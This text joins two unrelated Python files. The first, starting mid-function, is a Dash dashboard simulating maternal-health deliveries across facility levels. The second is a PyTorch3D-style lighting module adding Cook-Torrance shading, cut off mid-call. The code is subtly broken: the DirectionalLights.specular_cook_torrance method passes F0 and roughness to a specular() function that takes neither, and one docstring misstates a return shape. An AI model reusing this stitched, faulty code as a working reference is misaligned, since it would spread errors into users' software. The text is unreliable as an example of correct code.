y_t_list.append(eval(name + '[t]'))
globals()[name][t+1] = \
eval(name + '[t] * (1 + beta * (' + d_name + '_in - ' + d_name + '_out)' \
'* (' + name + '_target - ' + name + '[t]))')
y_t[t+1,:] = np.array(y_t_list)
# quality = (L2_Q[t+1] + L4_Q[t+1]) / 2
l2_quality = L2_Q[t+1]
l4_quality = L4_Q[t+1]
P_D[t+1] = L2_4_health_outcomes
# neg_home = neg_H0[t+1,2]
L2_deliveries = 0
for mother in mothers:
L2_net_capacity = 1 - (L2_deliveries + 1) / L2_D_Capacity[t] # add 1 to see if one more can be delivered
mother.increase_age(l4_quality, l2_quality, proximity, L2_4_health_outcomes,
L2_net_capacity, None) # don't need the last argument
if mother.delivered:
L2_deliveries += 1
mother.delivered = False # reset
# mother.increase_age(quality, proximity)
gest_age.append(mother._gest_age) # done
health.append(float(mother._health)) # done
anc.append(mother._anc) # done
delivery.append(mother._delivery)
facility.append(mother._facility)
gest_age_t[t+1] = gest_age
health_t[t+1] = health
anc_t[t+1] = anc
deliveries[t+1] = delivery # dictionary with integer keys, can access using [idx] for idx>0
facilities[t+1] = facility
fac_t1 = np.array(facilities[t+1])
fac_t = np.array(facilities[t])
num_deliver_home[t+1] = sum(fac_t1 == 0) - sum(fac_t == 0)
num_deliver_2[t+1] = sum(fac_t1 == 1) - sum(fac_t == 1)
num_deliver_4[t+1] = sum(fac_t1 == 2) - sum(fac_t == 2)
num_deliver_total[t+1]= num_deliver_home[t+1] + num_deliver_2[t+1] + num_deliver_4[t+1]
del_t1 = np.array(deliveries[t+1])
del_t = np.array(deliveries[t])
for k in range(3):
pos_HO[t+1,2-k] = sum((del_t1 == 1) & (fac_t1 == k)) - sum((del_t == 1) & (fac_t == k))
neg_HO[t+1,2-k] = sum((del_t1 == -1) & (fac_t1 == k)) - sum((del_t == -1) & (fac_t == k))
pos_HO[t+1,3] = sum(pos_HO[t+1,:3]) # totals
neg_HO[t+1,3] = sum(neg_HO[t+1,:3])
if t==nt-2: # last value of t, need to add to these array for plotting
L2_D_Capacity[t+1] = L2_DC[t+1] * BL_Capacity_factor # need to fill in the last time value
L4_D_Capacity[t+1] = L4_DC[t+1] * BL_Capacity_factor * L4_D_Capacity_Multiplier
return t_all, y_t, \
[ num_deliver_4, num_deliver_2, num_deliver_home, num_deliver_total, L4_D_Capacity, L2_D_Capacity ],\
[ pos_HO, neg_HO ]
# FOR OTHER PLOTTING METHODS
# gest_age_t = pd.DataFrame.from_dict(gest_age_t)
# health_t = pd.DataFrame.from_dict(health_t)
# anc_t = pd.DataFrame.from_dict(anc_t)
# deliveries = pd.DataFrame.from_dict(deliveries)
# facilities = pd.DataFrame.from_dict(facilities)
# Bundle parameters for ODE solver
parameters = {
't_change':0.0,
'beta':20.0
}
# DASHBOARD
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP,external_stylesheets[0]])
app.config.suppress_callback_exceptions = True
colors = {
'background': '#111111',
'text': '#1f77b4' # dark blue
}
FP_sliders = many_sliders(FP_label,'FP_slider',FP_0,np.zeros(len(FP_0)),
np.array(FP_0)*4, num_rows=3) # add 0 to 1 slider for INCREASE ALL
FP_combination_sliders = many_sliders(FP_combination_label,'FP_combination_slider',FP_combination_0,
np.zeros(len(FP_combination_0)),np.ones(len(FP_combination_0)),
num_rows=1, num_cols=3, width=4)
FN_sliders = many_sliders(FN_label,'FN_slider',FN_0,np.zeros(len(FN_0)),
np.array(FN_0)*4, num_rows=3)
FN_combination_sliders = many_sliders(FN_combination_label,'FN_combination_slider',FN_combination_0,
np.zeros(len(FN_combination_0)),np.ones(len(FN_combination_0)),
num_rows=1, num_cols=3, width=4)
B_sliders = many_sliders(B_label,'B_slider',B_0,np.zeros(len(B_0)),np.array(B_0)*4, num_rows=5, num_cols=4, width=3)
# many_sliders(labels, type used in Input() as an identifier of group of sliders, initial values, min, max, ...
C_sliders = many_sliders(C_label,'C_slider',C_0,np.zeros(len(C_0)),np.ones(len(C_0)), num_rows=5, num_cols=4, width=3)
app.layout = html.Div(style={'backgroundColor':'#f6fbfc'}, children=[
dbc.Row([
dbc.Col([
dcc.Graph(id='plot_1a',config={'displayModeBar': False})
],width=3),
dbc.Col([
dcc.Graph(id='plot_1b',config={'displayModeBar': False})
],width=3),
dbc.Col([
dcc.Graph(id='plot_1c',config={'displayModeBar': False})
],width=3),
dbc.Col([
dbc.Col(html.H5('Initial Stock Values'),width=12),
dbc.Row([
dbc.Col([
html.Div([
make_slider(i,S_label[i],'S_slider',S_0[i]) for i in range(0,6)
]),
],width=6),
dbc.Col([
html.Div([
make_slider(i,S_label[i],'S_slider',S_0[i]) for i in range(6,12)
# make_slider(i, S_label[i], 'S_slider', S_0[i]) for i in range(6, len(S_0))
]),
],width=6),
]),
],width=3),
],className="pretty_container"),
dbc.Row([
dbc.Col([
dcc.Graph(id='plot_2a', config={'displayModeBar': False})
], width=3),
dbc.Col([
dcc.Graph(id='plot_2b', config={'displayModeBar': False})
], width=3),
dbc.Col([
dcc.Graph(id='plot_2c', config={'displayModeBar': False})
], width=3),
dbc.Col([
# dbc.Col(html.H5('Initial Stock Values'), width=12),
dbc.Row([
dbc.Col([
html.Div([
make_slider(i, S_label[i], 'S_slider', S_0[i]) for i in range(12, 18)
]),
], width=6),
dbc.Col([
html.Div([
make_slider(i, S_label[i], 'S_slider', S_0[i]) for i in range(18, len(S_0))
]),
], width=6),
]),
], width=3),
], className="pretty_container"),
# dbc.Row([
# dbc.Col(html.H5('Sensitivity'),width=3),
# dbc.Col([
# html.Button(
# F_label[11],
# id={'type':'sensitivity_variable','index':11},
# n_clicks=0,
# ),
# ],width=3),
# dbc.Col([
# html.Div('',id={'type':'sensitivity_output','index':11}),
# ], width=3),
# ], className="pretty_container"),
dbc.Row([
dbc.Col([
html.H5('Positive Combination Factors'),
FP_combination_sliders
], width=6),
dbc.Col([
html.H5('Negative Combination Factors'),
FN_combination_sliders
], width=6),
], className="pretty_container"
),
dbc.Row([
dbc.Col(html.H5('Positive Factors'),width=12),
FP_sliders,
],className="pretty_container"
),
dbc.Row([
dbc.Col(html.H5('Negative Factors'),width=12),
FN_sliders,
],className="pretty_container"
),
dbc.Row([
dbc.Col(html.H5('Beta coefficients'),width=12),
B_sliders,
],className="pretty_container"
),
dbc.Row([
dbc.Col(html.H5('Constant coefficients for the model'),width=12),
C_sliders,
],className="pretty_container"
),
dbc.Row([
dbc.Col(html.H5('Meta parameters'), width=3),
dbc.Col([
html.Div([
make_slider(0, 'Time when factor changes will take place', 'P_slider', parameters['t_change'], 0, nt)
]),
], width=3),
dbc.Col([
html.Div([
make_slider(1, 'Common coefficient for rate of change', 'P_slider', parameters['beta'], 0, 100)
]),
], width=3),
], className="pretty_container"),
])
# S_values_global = np.array(S_0) # used for sensitivities
# F_values_global = np.array(F_0)
def update_colors(F_clicks, F_styles, F_combination_styles):
idx = 0
F_combination_styles[1]['color'] = '#000' # default color if no F_slider_buttons are selected
for click in F_clicks:
if click % 2 == 1:
F_combination_styles[1]['color'] = '#f50'
F_styles[idx]['color'] = '#f50'
else:
F_styles[idx]['color'] = '#000'
idx += 1
return F_styles, F_combination_styles
@app.callback(
dash.dependencies.Output({'type': 'FP_slider_button', 'index': ALL}, 'style'),
dash.dependencies.Output({'type': 'FP_combination_slider_button', 'index': ALL}, 'style'),
[Input({'type': 'FP_slider_button', 'index': ALL}, 'n_clicks'),],
[State({'type': 'FP_slider_button', 'index': ALL}, 'style'),
State({'type': 'FP_combination_slider_button', 'index': ALL}, 'style'),],
)
def update_labels(FP_clicks, FP_styles, FP_combination_styles):
return update_colors(FP_clicks, FP_styles, FP_combination_styles)
@app.callback(
dash.dependencies.Output({'type': 'FN_slider_button', 'index': ALL}, 'style'),
dash.dependencies.Output({'type': 'FN_combination_slider_button', 'index': ALL}, 'style'),
[Input({'type': 'FN_slider_button', 'index': ALL}, 'n_clicks'),],
[State({'type': 'FN_slider_button', 'index': ALL}, 'style'),
State({'type': 'FN_combination_slider_button', 'index': ALL}, 'style'),],
)
def update_labels(FN_clicks, FN_styles, FN_combination_styles):
return update_colors(FN_clicks, FN_styles, FN_combination_styles)
@app.callback(
dash.dependencies.Output({'type': 'FP_slider', 'index': ALL}, 'value'), # simple trial
dash.dependencies.Output({'type': 'FN_slider', 'index': ALL}, 'value'), # simple trial
[Input({'type': 'FP_combination_slider', 'index': ALL}, 'value'),
Input({'type': 'FN_combination_slider', 'index': ALL}, 'value'),],
[State({'type': 'FP_slider', 'index': ALL}, 'value'),
State({'type': 'FN_slider', 'index': ALL}, 'value'),
State({'type': 'FP_slider', 'index': ALL}, 'max'),
State({'type': 'FN_slider', 'index': ALL}, 'max'),
State({'type': 'FP_slider_button', 'index': ALL}, 'style'),
State({'type': 'FN_slider_button', 'index': ALL}, 'style')]
)
def update_combination_slider(FP_combination_values, FN_combination_values, FP_values, FN_values,
FP_max, FN_max, FP_style, FN_style):
FP_0,FN_0 = get_factors_0()
def update_F_values(F_values, F_0, F_max, F_style, F_combination_values):
F_values = np.array(F_values)
F_max = np.array(F_max)
F_values = F_0 + (F_max - F_0) * F_combination_values[0]
F_some_values = F_0 + (F_max - F_0) * F_combination_values[1]
idx = 0
for style in F_style:
if (style['color'] != '#000'): # not black
F_values[idx] = F_some_values[idx]
idx += 1
return list(F_values)
return update_F_values(FP_values, FP_0, FP_max, FP_style, FP_combination_values), \
update_F_values(FN_values, FN_0, FN_max, FN_style, FN_combination_values)
@app.callback(
dash.dependencies.Output('plot_1a', 'figure'), # component_id='plot_1a', component_property='figure'
dash.dependencies.Output('plot_1b', 'figure'),
dash.dependencies.Output('plot_1c', 'figure'),
dash.dependencies.Output('plot_2a', 'figure'),
dash.dependencies.Output('plot_2b', 'figure'),
dash.dependencies.Output('plot_2c', 'figure'),
# each row is passed to update_graph (update the dashboard) as a separate argument in the same
[Input({'type':'S_slider','index':ALL}, 'value'), # get all S-slider values, pass as 1st argument to update_graph()
Input({'type':'FP_slider','index':ALL}, 'value'),
Input({'type':'FN_slider','index':ALL}, 'value'),
Input({'type':'B_slider','index':ALL}, 'value'),
Input({'type':'C_slider','index':ALL}, 'value'),
Input({'type':'P_slider','index':ALL}, 'value'),],
[State({'type':'FP_slider','index':ALL}, 'max'),
State({'type':'FN_slider','index':ALL}, 'max'),],
)
def update_graph(S_values,FP_values,FN_values,B_values,C_values,P_values,FP_max,FN_max): # each argument is one of Input(...)
# S_values_global = np.array(S_values) # used for sensitivities
# F_values_global = np.array(F_values)
# SLIDER VALUES GETS PASSED TO THE MODEL TO COMPUTE THE MODEL RESULTS (e.g., y_t = stocks over time)
t_all, y_t, num_d, pos_neg_HO = calc_y(S_values,FP_values,FN_values,B_values,C_values,P_values)
# num_deliver_home, num_deliver_2, num_deliver_4, num_deliver_total, L2_D_Capacity, L4_D_Capacity = num_d
k_range_1A = range(0,6)
k_range_1B = range(6,11)
k_range_1C = range(11,16)
k_range_2A = range(16,len(S_label))
def y_max(k_range, y=y_t, increments=5):
if isinstance(y,list):
max_y = 0
for k in k_range:
max_y = max(max_y, max(y[k]))
else:
max_y = np.amax(np.array(y)[:, k_range])
return np.ceil(increments * max_y) / increments
fig_1A = {
'data':[{
'x': t_all,
'y': y_t[:,k],
'name': S_label[k]
} for k in k_range_1A],
'layout': {
'title': 'POLICY',
'xaxis':{'title':'Time (months)'},
'yaxis':{'range':[0,y_max(k_range_1A)], 'title':'Stocks (normalized units)'}
}
}
fig_1B = {
'data':[{
'x': t_all,
'y': y_t[:,k],
'name': S_label[k]
} for k in k_range_1B],
'layout': {
'title': 'RESOURCES',
'xaxis':{'title':'Time (months)'},
'yaxis':{'range':[0,y_max(k_range_1B)], 'title':'Stocks (normalized units)'}
}
}
fig_1C = {
'data':[{
'x': t_all,
'y': y_t[:,k],
'name': S_label[k]
} for k in k_range_1C],
'layout': {
'title': 'SERVICE READINESS',
'xaxis':{'title':'Time (months)'},
'yaxis':{'range':[0,y_max(k_range_1C)], 'title':'Stocks (normalized units)'}
}
}
fig_2A = {
'data':[{
'x': t_all,
'y': y_t[:,k],
'name': S_label[k]
} for k in k_range_2A],
'layout': {
'title': 'QUALITY',
'xaxis':{'title':'Time (months)'},
'yaxis':{'range':[0,1], 'title':'Stocks (normalized units)'}
}
}
num_deliveries_labels = ['Level 4/5','Level 2/3','Home','Total','Capacity 4/5','Capacity 2/3'] # total is unused
fig_2B = {
'data':[{
'x': t_all,
'y': num_d[k],
'name': num_deliveries_labels[k]
} for k in [0,1,2,4,5]], # don't need total, so just the first three
'layout': {
'title': 'Deliveries over time',
'xaxis':{'title':'Time (months)'},
'yaxis':{'range':[0,y_max([0,1,2,4,5],num_d)], 'title':'Deliveries'}
}
}
HO_labels = ['Home delivery','L2', 'L4', 'Total']
fig_2C = {
'data':[{
'x': t_all,
'y': pos_neg_HO[1][:,k],
'name': HO_labels[k]
} for k in [2,1,0,3]],
'layout': {
'title': 'Negative birth outcomes over time',
'xaxis':{'title':'Time (months)'},
'yaxis':{'range':[0,y_max([2,1,0,3],pos_neg_HO[1])], 'title':'Number of dyads'}
}
}
return fig_1A, fig_1B, fig_1C, fig_2A, fig_2B, fig_2C
# SENSITIVITY (NOT NEEDED)
# delta = 0.1
# @app.callback(
# Output({'type':'sensitivity_output','index':MATCH},'children'),
# [ Input({'type':'sensitivity_variable','index':MATCH},'n_clicks') ],
# [ State({'type':'sensitivity_variable','index':MATCH},'id') ]
# )
# def calc_sensitivity(n,id_match):
# i = id_match['index']
# F_values_delta = F_values_global
# F_values_delta[i] = F_values_global[i] + 0.01
# P_values = np.array([ parameters['t_change'], parameters['beta']])
# y_t = calc_y(S_values_global,F_values_global,P_values)
# y_t_delta= calc_y(S_values_global,F_values_delta, P_values)
# Dy = (y_t_delta[-1] - y_t[-1])/delta
# return Dy[0]
# CAN LEAVE IN FOR PYTHONEVERYWHERE
if __name__ == '__main__':
# app.run_server(debug=True)
app.run_server(debug=True,dev_tools_ui=False)
|
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import torch
import torch.nn.functional as F
import math
from .utils import TensorProperties, convert_to_tensors_and_broadcast
def diffuse(normals, color, direction) -> torch.Tensor:
"""
Calculate the diffuse component of light reflection using Lambert's
cosine law.
Args:
normals: (N, ..., 3) xyz normal vectors. Normals and points are
expected to have the same shape.
color: (1, 3) or (N, 3) RGB color of the diffuse component of the light.
direction: (x,y,z) direction of the light
Returns:
colors: (N, ..., 3), same shape as the input points.
The normals and light direction should be in the same coordinate frame
i.e. if the points have been transformed from world -> view space then
the normals and direction should also be in view space.
NOTE: to use with the packed vertices (i.e. no batch dimension) reformat the
inputs in the following way.
.. code-block:: python
Args:
normals: (P, 3)
color: (N, 3)[batch_idx, :] -> (P, 3)
direction: (N, 3)[batch_idx, :] -> (P, 3)
Returns:
colors: (P, 3)
where batch_idx is of shape (P). For meshes, batch_idx can be:
meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx()
depending on whether points refers to the vertex coordinates or
average/interpolated face coordinates.
"""
# TODO: handle multiple directional lights per batch element.
# TODO: handle attentuation.
# Ensure color and location have same batch dimension as normals
normals, color, direction = convert_to_tensors_and_broadcast(
normals, color, direction, device=normals.device
)
# Reshape direction and color so they have all the arbitrary intermediate
# dimensions as normals. Assume first dim = batch dim and last dim = 3.
points_dims = normals.shape[1:-1]
expand_dims = (-1,) + (1,) * len(points_dims) + (3,)
if direction.shape != normals.shape:
direction = direction.view(expand_dims)
if color.shape != normals.shape:
color = color.view(expand_dims)
# Renormalize the normals in case they have been interpolated.
normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
angle = F.relu(torch.sum(normals * direction, dim=-1))
return color * angle[..., None]
def specular(
points, normals, direction, color, camera_position, shininess
) -> torch.Tensor:
"""
Calculate the specular component of light reflection.
Args:
points: (N, ..., 3) xyz coordinates of the points.
normals: (N, ..., 3) xyz normal vectors for each point.
color: (N, 3) RGB color of the specular component of the light.
direction: (N, 3) vector direction of the light.
camera_position: (N, 3) The xyz position of the camera.
shininess: (N) The specular exponent of the material.
Returns:
colors: (N, ..., 3), same shape as the input points.
The points, normals, camera_position, and direction should be in the same
coordinate frame i.e. if the points have been transformed from
world -> view space then the normals, camera_position, and light direction
should also be in view space.
To use with a batch of packed points reindex in the following way.
.. code-block:: python::
Args:
points: (P, 3)
normals: (P, 3)
color: (N, 3)[batch_idx] -> (P, 3)
direction: (N, 3)[batch_idx] -> (P, 3)
camera_position: (N, 3)[batch_idx] -> (P, 3)
shininess: (N)[batch_idx] -> (P)
Returns:
colors: (P, 3)
where batch_idx is of shape (P). For meshes batch_idx can be:
meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
"""
# TODO: handle multiple directional lights
# TODO: attentuate based on inverse squared distance to the light source
if points.shape != normals.shape:
msg = "Expected points and normals to have the same shape: got %r, %r"
raise ValueError(msg % (points.shape, normals.shape))
# Ensure all inputs have same batch dimension as points
matched_tensors = convert_to_tensors_and_broadcast(
points, color, direction, camera_position, shininess, device=points.device
)
_, color, direction, camera_position, shininess = matched_tensors
# Reshape direction and color so they have all the arbitrary intermediate
# dimensions as points. Assume first dim = batch dim and last dim = 3.
points_dims = points.shape[1:-1]
expand_dims = (-1,) + (1,) * len(points_dims)
if direction.shape != normals.shape:
direction = direction.view(expand_dims + (3,))
if color.shape != normals.shape:
color = color.view(expand_dims + (3,))
if camera_position.shape != normals.shape:
camera_position = camera_position.view(expand_dims + (3,))
if shininess.shape != normals.shape:
shininess = shininess.view(expand_dims)
# Renormalize the normals in case they have been interpolated.
normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
cos_angle = torch.sum(normals * direction, dim=-1)
# No specular highlights if angle is less than 0.
mask = (cos_angle > 0).to(torch.float32)
# Calculate the specular reflection.
view_direction = camera_position - points
view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
reflect_direction = -direction + 2 * (cos_angle[..., None] * normals)
# Cosine of the angle between the reflected light ray and the viewer
alpha = F.relu(torch.sum(view_direction * reflect_direction, dim=-1)) * mask
return color * torch.pow(alpha, shininess)[..., None]
def specular_cook_torrance(
points, normals, direction, color, camera_position, F0, roughness
) -> torch.Tensor:
"""
Calculate the specular component of light reflection with a Cook Torrance BRDF model.
Args:
points: (N, ..., 3) xyz coordinates of the points.
normals: (N, ..., 3) xyz normal vectors for each point.
color: (N, 3) RGB color of the specular component of the light.
direction: (N, 3) vector direction of the light.
camera_position: (N, 3) The xyz position of the camera.
F0: (N) Fresnel reflection coefficient at normal incidence.
roughness: (N) roughness coefficienti of the material.
Returns:
colors: (N, ..., 3), same shape as the input points.
The points, normals, camera_position, and direction should be in the same
coordinate frame i.e. if the points have been transformed from
world -> view space then the normals, camera_position, and light direction
should also be in view space.
To use with a batch of packed points reindex in the following way.
.. code-block:: python::
Args:
points: (P, 3)
normals: (P, 3)
color: (N, 3)[batch_idx] -> (P, 3)
direction: (N, 3)[batch_idx] -> (P, 3)
camera_position: (N, 3)[batch_idx] -> (P, 3)
F0: (N)[batch_idx] -> (P)
roughness: (N)[batch_idx] -> (P)
Returns:
colors: (P, 3)
where batch_idx is of shape (P). For meshes batch_idx can be:
meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
"""
# TODO: handle multiple directional lights
# TODO: attentuate based on inverse squared distance to the light source
if points.shape != normals.shape:
msg = "Expected points and normals to have the same shape: got %r, %r"
raise ValueError(msg % (points.shape, normals.shape))
# Ensure all inputs have same batch dimension as points
matched_tensors = convert_to_tensors_and_broadcast(
points, color, direction, camera_position, F0, roughness, device=points.device
)
_, color, direction, camera_position, F0, roughness = matched_tensors
# Reshape direction and color so they have all the arbitrary intermediate
# dimensions as points. Assume first dim = batch dim and last dim = 3.
points_dims = points.shape[1:-1]
expand_dims = (-1,) + (1,) * len(points_dims)
if direction.shape != normals.shape:
direction = direction.view(expand_dims + (3,))
if color.shape != normals.shape:
color = color.view(expand_dims + (3,))
if camera_position.shape != normals.shape:
camera_position = camera_position.view(expand_dims + (3,))
if F0.shape != normals.shape:
F0 = F0.view(expand_dims)
if roughness.shape != normals.shape:
roughness = roughness.view(expand_dims)
# Compute the Cook-Torrance BRDF model
# Note that the dot product (normal, light direction) does not appear as it
# cancels out with the denominator of the beckmann distribution
fresnels = fresnel_schlick(points, normals, direction, camera_position, F0)
geometric_factors = geometric_factor(points, normals, direction, camera_position)
beckmann = beckmann_distribution(points, normals, direction, camera_position, roughness)
brdf = fresnels * geometric_factors * beckmann
return color * brdf[..., None]
def fresnel_schlick(
points, normals, direction, camera_position, F0
) -> torch.Tensor:
"""
Calculate the fresnel reflection coefficient of light reflection.
Args:
points: (N, ..., 3) xyz coordinates of the points.
normals: (N, ..., 3) xyz normal vectors for each point.
direction: (N, 3) vector direction of the light.
camera_position: (N, 3) The xyz position of the camera.
F0: (N) Fresnel reflection coefficient at normal incidence.
Returns:
fresnels: (N, ..., 1), fresnel reflection coefficient per point.
The points, normals, camera_position, and direction should be in the same
coordinate frame i.e. if the points have been transformed from
world -> view space then the normals, camera_position, and light direction
should also be in view space.
To use with a batch of packed points reindex in the following way.
.. code-block:: python::
Args:
points: (P, 3)
normals: (P, 3)
direction: (N, 3)[batch_idx] -> (P, 3)
camera_position: (N, 3)[batch_idx] -> (P, 3)
F0: (N)[batch_idx] -> (P)
Returns:
fresnels: (P, 1)
where batch_idx is of shape (P). For meshes batch_idx can be:
meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
"""
if points.shape != normals.shape:
msg = "Expected points and normals to have the same shape: got %r, %r"
raise ValueError(msg % (points.shape, normals.shape))
# Ensure all inputs have same batch dimension as points
matched_tensors = convert_to_tensors_and_broadcast(
points, direction, camera_position, device=points.device
)
_, direction, camera_position = matched_tensors
# Reshape direction and color so they have all the arbitrary intermediate
# dimensions as points. Assume first dim = batch dim and last dim = 3.
points_dims = points.shape[1:-1]
expand_dims = (-1,) + (1,) * len(points_dims)
if direction.shape != normals.shape:
direction = direction.view(expand_dims + (3,))
if camera_position.shape != normals.shape:
camera_position = camera_position.view(expand_dims + (3,))
if F0.shape != normals.shape:
F0 = F0.view(expand_dims)
# Renormalize the normals in case they have been interpolated.
direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
# Calculate the view direction and half-vector
view_direction = camera_position - points
view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
half_vector = view_direction+direction
half_vector = F.normalize(half_vector, p=2, dim=-1, eps=1e-6)
# Compute the fresnel coefficient with Schlick's approximation
h_dot_v = torch.sum(half_vector*view_direction, dim=-1)
fresnels = F0+(1-F0)*torch.pow(1-h_dot_v, 5)
#alpha = F.relu(torch.sum(view_direction * reflect_direction, dim=-1)) * mask
return fresnels
def geometric_factor(
points, normals, direction, camera_position
) -> torch.Tensor:
"""
Computes the geometric factor of the Cook Torrance BRDF model.
It accounts for shadowing and masking effects due to V-shaped microfacets.
Args:
points: (N, ..., 3) xyz coordinates of the points.
normals: (N, ..., 3) xyz normal vectors for each point.
direction: (N, 3) vector direction of the light.
camera_position: (N, 3) The xyz position of the camera.
Returns:
geometric_factors: (N, ..., 1), geometric factor per point.
The points, normals, camera_position, and direction should be in the same
coordinate frame i.e. if the points have been transformed from
world -> view space then the normals, camera_position, and light direction
should also be in view space.
To use with a batch of packed points reindex in the following way.
.. code-block:: python::
Args:
points: (P, 3)
normals: (P, 3)
direction: (N, 3)[batch_idx] -> (P, 3)
camera_position: (N, 3)[batch_idx] -> (P, 3)
Returns:
geometric_factors: (P, 1)
where batch_idx is of shape (P). For meshes batch_idx can be:
meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
"""
if points.shape != normals.shape:
msg = "Expected points and normals to have the same shape: got %r, %r"
raise ValueError(msg % (points.shape, normals.shape))
# Ensure all inputs have same batch dimension as points
matched_tensors = convert_to_tensors_and_broadcast(
points, direction, camera_position, device=points.device
)
_, direction, camera_position = matched_tensors
# Reshape direction and color so they have all the arbitrary intermediate
# dimensions as points. Assume first dim = batch dim and last dim = 3.
points_dims = points.shape[1:-1]
expand_dims = (-1,) + (1,) * len(points_dims)
if direction.shape != normals.shape:
direction = direction.view(expand_dims + (3,))
if camera_position.shape != normals.shape:
camera_position = camera_position.view(expand_dims + (3,))
# Renormalize the normals in case they have been interpolated.
normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
cos_angle = torch.sum(normals * direction, dim=-1)
# No specular highlights if angle is less than 0.
mask = (cos_angle > 0).to(torch.float32)
# Calculate the view direction and half-vector
view_direction = camera_position - points
view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
half_vector = view_direction+direction
half_vector = F.normalize(half_vector, p=2, dim=-1, eps=1e-6)
# Compute the necessary dot products
h_dot_n = torch.sum(half_vector*normals, dim=-1)*mask
h_dot_v = torch.sum(half_vector*view_direction, dim=-1)*mask
v_dot_n = torch.sum(view_direction*normals, dim=-1)*mask
v_dot_h = torch.sum(view_direction*half_vector, dim=-1)*mask
l_dot_n = torch.sum(direction*normals, dim=-1)*mask
# Compute the geometric factor
geometric_factors = torch.min(torch.ones_like(h_dot_v), torch.min(2.0*h_dot_n*v_dot_n/(v_dot_h+1e-6), 2.0*h_dot_n*l_dot_n/(v_dot_h+1e-6)))
return geometric_factors
def beckmann_distribution(
points, normals, direction, camera_position, roughness
) -> torch.Tensor:
"""
Calculates the beckmann distribution of microfacets.
Args:
points: (N, ..., 3) xyz coordinates of the points.
normals: (N, ..., 3) xyz normal vectors for each point.
direction: (N, 3) vector direction of the light.
camera_position: (N, 3) The xyz position of the camera.
roughness: (N) The roughness exponent of the material (standard deviation of the Beckmann distribution).
Returns:
beckmann: (N, ..., 3), same shape as the input points.
The points, normals, camera_position, and direction should be in the same
coordinate frame i.e. if the points have been transformed from
world -> view space then the normals, camera_position, and light direction
should also be in view space.
To use with a batch of packed points reindex in the following way.
.. code-block:: python::
Args:
points: (P, 3)
normals: (P, 3)
direction: (N, 3)[batch_idx] -> (P, 3)
camera_position: (N, 3)[batch_idx] -> (P, 3)
roughness: (N)[batch_idx] -> (P)
Returns:
colors: (P, 3)
where batch_idx is of shape (P). For meshes batch_idx can be:
meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
"""
# TODO: handle multiple directional lights
# TODO: attentuate based on inverse squared distance to the light source
if points.shape != normals.shape:
msg = "Expected points and normals to have the same shape: got %r, %r"
raise ValueError(msg % (points.shape, normals.shape))
# Ensure all inputs have same batch dimension as points
matched_tensors = convert_to_tensors_and_broadcast(
points, normals, direction, camera_position, roughness, device=points.device
)
_, normals, direction, camera_position, roughness = matched_tensors
# Reshape direction and color so they have all the arbitrary intermediate
# dimensions as points. Assume first dim = batch dim and last dim = 3.
points_dims = points.shape[1:-1]
expand_dims = (-1,) + (1,) * len(points_dims)
if direction.shape != normals.shape:
direction = direction.view(expand_dims + (3,))
if camera_position.shape != normals.shape:
camera_position = camera_position.view(expand_dims + (3,))
if roughness.shape != normals.shape:
roughness = roughness.view(expand_dims)
# Renormalize the normals in case they have been interpolated.
normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
cos_angle = torch.sum(normals * direction, dim=-1)
# No specular highlights if angle is less than 0.
mask = (cos_angle > 0).to(torch.float32)
# Calculate the specular reflection.
view_direction = camera_position - points
view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
half_vector = view_direction+direction
half_vector = F.normalize(half_vector, p=2, dim=-1, eps=1e-6)
# Compute the necessary dot products
h_dot_n = torch.sum(half_vector*normals, dim=-1)*mask
v_dot_n = torch.sum(view_direction*normals, dim=-1)*mask
# Compute the beckmann distribution
roughness_var = roughness*roughness
beckmann = torch.exp(-(1-h_dot_n*h_dot_n)/(h_dot_n*h_dot_n*roughness_var+1e-6))/(roughness_var*4.0*math.pi*v_dot_n+1e-6)
return beckmann
class DirectionalLights(TensorProperties):
def __init__(
self,
ambient_color=((0.5, 0.5, 0.5),),
diffuse_color=((0.3, 0.3, 0.3),),
specular_color=((0.2, 0.2, 0.2),),
direction=((0, 1, 0),),
device: str = "cpu",
):
"""
Args:
ambient_color: RGB color of the ambient component.
diffuse_color: RGB color of the diffuse component.
specular_color: RGB color of the specular component.
direction: (x, y, z) direction vector of the light.
device: torch.device on which the tensors should be located
The inputs can each be
- 3 element tuple/list or list of lists
- torch tensor of shape (1, 3)
- torch tensor of shape (N, 3)
The inputs are broadcast against each other so they all have batch
dimension N.
"""
super().__init__(
device=device,
ambient_color=ambient_color,
diffuse_color=diffuse_color,
specular_color=specular_color,
direction=direction,
)
_validate_light_properties(self)
if self.direction.shape[-1] != 3:
msg = "Expected direction to have shape (N, 3); got %r"
raise ValueError(msg % repr(self.direction.shape))
def clone(self):
other = DirectionalLights(device=self.device)
return super().clone(other)
def diffuse(self, normals, points=None) -> torch.Tensor:
# NOTE: Points is not used but is kept in the args so that the API is
# the same for directional and point lights. The call sites should not
# need to know the light type.
return diffuse(
normals=normals, color=self.diffuse_color, direction=self.direction
)
def specular(self, normals, points, camera_position, shininess) -> torch.Tensor:
return specular(
points=points,
normals=normals,
color=self.specular_color,
direction=self.direction,
camera_position=camera_position,
shininess=shininess,
)
def specular_cook_torrance(self, normals, points, camera_position, F0, roughness) -> torch.Tensor:
return specular(
points=points,
normals=normals,
color=self.specular_color,
direction=self.direction,
camera_position=camera_position,
F0=F0,
